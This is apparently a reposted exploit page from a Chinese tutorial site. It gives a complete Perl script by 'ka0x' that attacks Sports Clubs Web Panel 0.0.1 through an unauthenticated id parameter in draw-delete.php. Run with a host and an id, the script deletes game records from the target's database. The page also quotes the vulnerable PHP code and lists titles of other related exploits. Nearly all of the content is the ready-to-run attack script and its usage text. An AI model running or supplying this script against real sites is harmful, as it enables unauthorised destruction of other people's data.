手机
当前位置:查字典教程网 >网络安全 >Exploit >Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
摘要:#!/usr/bin/perl-W#SportsClubsWebPanel0.0.1RemoteGameDeleteExploit#File...

#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];

# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org -

# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3

use LWP::UserAgent; my $host = $ARGV[0];

my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE

{

die "

- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -

- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>

ex: ./$0 http://localhost/sportspanel 2

";

} my $ua = LWP::UserAgent->new() or die;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);

my $res = $ua->request($req);

my $con = $res->content; if ($res->is_success){

if($con =~ /$did/){

print "[ ] The Game "$did" has been deleted from the database!n";

}

} else{

print "[-] Exploit Failed!";

} __END__

【Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit】相关文章:

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

精品推荐
分类导航